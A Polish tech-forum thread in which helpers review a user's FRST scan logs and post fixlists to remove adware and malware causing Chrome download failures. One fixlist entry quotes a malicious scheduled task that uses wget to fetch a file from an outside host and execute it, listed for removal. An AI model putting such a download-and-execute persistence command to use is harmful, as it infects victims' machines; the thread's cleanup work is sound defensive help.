Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

[Rozwiązano] Logi FRST - prośba o sprawdzenie. Błąd z chrome.

Chavalier 29 Mar 2017 22:45 417 8
  • #1 29 Mar 2017 22:45
    Chavalier
    Poziom 3  

    Witam,
    oto zestawienie moich logów z FRST64, proszę o sprawdzenie.
    Mam problem z chrome, gdy próbuje coś ściągnać z przedlądarki nic się nie dzieje, nie moge pobrac ani automatycznie ani manualnie oraz nie mogłem dodać załączników z chrome. Post piszę z interent explorer.

    0 8
  • #2 29 Mar 2017 22:57
    krzychupar
    Poziom 41  

    Otwórz notatnik systemowy i wklej:

    CHR HomePage: Default -> hxxp://feed.helperbar.com/?publisher=OPENCAND...16&affid=111585&searchtype=hp&babsrc=lnkry_nt
    CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
    S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.5.0.124\Definitions\SDSDefs\20170321.021\NAVENG.SYS [X]
    S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.5.0.124\Definitions\SDSDefs\20170321.021\NAVEX15.SYS [X]
    C:\Users\Mateusz\multibit-windows-x64-0.5.1.exe
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze obok FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #4 30 Mar 2017 18:50
    Kolobos
    Spec od komputerów

    W Chrome Adblock zmien na uBlock Origin.

    Wykonaj Fixlist.txt dla FRST:
    Task: {37BF573E-471C-4E3D-81A0-2DAB868CDC00} - System32\Tasks\{B2EF029A-3AE3-488A-9499-C5FE6E331938} => pcalua.exe -a "C:\Program Files (x86)\Damian Pasternak\CWK\CWK.exe" -d "C:\Program Files (x86)\Damian Pasternak\CWK\"
    Task: {5B94BB5D-F56C-4DEC-A845-2C75FF5551FE} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=EwdBTPL0MP;Minecraft_1.8.1_Setup.exe;1452617835 &amp; start cmd /R dat.bmp <==== UWAGA
    Task: {9E3CF0B6-AE8A-4F10-BD8A-54A83C09CCA0} - System32\Tasks\{4AD279E3-9A64-4747-84F5-DBE4B71B6D4A} => pcalua.exe -a I:\Uruchom.exe -d I:\
    Task: {A43AA4E5-7BFF-4F67-BC72-67C7C2B3FB78} - System32\Tasks\{2DD2F34A-8771-4A05-B270-D318C7DE3B69} => pcalua.exe -a "C:\Users\Tomek\Desktop\Upload by HansKlos\Install.exe" -d "C:\Users\Tomek\Desktop\Upload by HansKlos"
    Task: {A6F36A2E-5788-46FF-BD31-EDD238C03199} - System32\Tasks\{315C9406-CBB4-42A5-AC01-98DBD137F50E} => pcalua.exe -a "C:\Users\Tomek\Desktop\bst212\BMW Standard Tools 2.12\Standard_Tools_Setup_2.12.exe" -d "C:\Users\Tomek\Desktop\bst212\BMW Standard Tools 2.12"
    Task: {D442025C-96C8-4AED-8C95-F580DCEC01D7} - System32\Tasks\{EE4050E9-2D2D-4371-9D78-D74C1299F625} => pcalua.exe -a C:\Users\Tomek\Desktop\cwk252_setup.exe -d C:\Users\Tomek\Desktop
    Task: {E243ECE7-A028-4B9C-A9BD-339DB122C3AD} - System32\Tasks\{3DD3B779-907A-4133-BAEB-620E500E22D6} => pcalua.exe -a C:\EDIABAS\Hardware\CAN\setup.exe
    HKU\S-1-5-21-2756060167-294891085-3003495681-1001\...\Run: [Mobile Partner] => C:\Program Files (x86)\PLAY ONLINE\PLAY ONLINE
    HKU\S-1-5-21-2756060167-294891085-3003495681-1001\...\MountPoints2: {1923f1da-3228-11e5-bffb-0cd292630e6a} - "G:\startme.exe"
    HKU\S-1-5-21-2756060167-294891085-3003495681-1001\...\MountPoints2: {35a133d9-6e38-11e4-bf56-0cd292630e6a} - "G:\AutoRun.exe"
    HKU\S-1-5-21-2756060167-294891085-3003495681-1001\...\MountPoints2: {35a13490-6e38-11e4-bf56-0cd292630e6a} - "G:\AutoRun.exe"
    HKU\S-1-5-21-2756060167-294891085-3003495681-1001\...\MountPoints2: {7e32a225-cddf-11e6-807d-0cd292630e6a} - "G:\AutoRun.exe"
    HKU\S-1-5-21-2756060167-294891085-3003495681-1001\...\MountPoints2: {827af844-ab54-11e3-bea8-0cd292630e6a} - "G:\LGAutoRun.exe"
    HKU\S-1-5-21-2756060167-294891085-3003495681-1001\...\MountPoints2: {9d9ae9af-70be-11e5-8017-0cd292630e6a} - "G:\Startme.exe"
    HKU\S-1-5-21-2756060167-294891085-3003495681-1001\...\MountPoints2: {fb5a79e0-ff80-11e4-bfd6-0cd292630e6a} - "G:\AutoRun.exe"
    ShellIconOverlayIdentifiers: [SugarSyncBackedUp] -> {0C4A258A-3F3B-4FFF-80A7-9B3BEC139472} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [SugarSyncPending] -> {62CCD8E3-9C21-41E1-B55E-1E26DFC68511} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [SugarSyncRoot] -> {A759AFF6-5851-457D-A540-F4ECED148351} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [SugarSyncShared] -> {1574C9EF-7D58-488F-B358-8B78C1538F51} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll -> Brak pliku
    CHR Extension: (Shortcuts Useful ) - C:\Users\Tomek\AppData\Local\Google\Chrome\User Data\Default\Extensions\diaapbhiendminpgmljmkkibpkcgeefj [2017-03-28]
    CHR Extension: (AdBlock) - C:\Users\Tomek\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-03-30]
    CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg] - hxxps://clients2.google.com/service/update2/crx
    2017-03-30 15:32 - 2017-03-30 17:03 - 00000000 ____D C:\AdwCleaner
    2017-03-30 15:07 - 2016-01-13 16:06 - 00000000 _____ C:\ProgramData\dat.bmp
    2015-07-25 15:12 - 2015-07-25 15:12 - 29593968 _____ (Sony Mobile Communications ) C:\Users\Tomek\AppData\Local\pcc.exe
    2016-01-12 18:57 - 2016-01-12 18:57 - 0000008 _____ () C:\ProgramData\-
    2016-01-13 16:06 - 2017-03-30 15:07 - 0000000 _____ () C:\ProgramData\dat.bmp
    2016-01-12 18:56 - 2016-01-12 18:56 - 0401408 _____ () C:\ProgramData\wget.exe
    EmptyTemp:

    1
  • #6 30 Mar 2017 19:04
    Kolobos
    Spec od komputerów

    Czy problem nadal wystepuje?

    0
  • #7 30 Mar 2017 19:50
    szerkan87
    Poziom 7  

    Nie występuje Dzieki za pomoc

    0
  • #8 30 Mar 2017 19:54
    Kolobos
    Spec od komputerów

    Usun katalog C:\FRST i to wszystko.

    0
  • #9 20 Maj 2018 00:09
    Chavalier
    Poziom 3  

    Rozwiązano poprzez to co wyzej

    0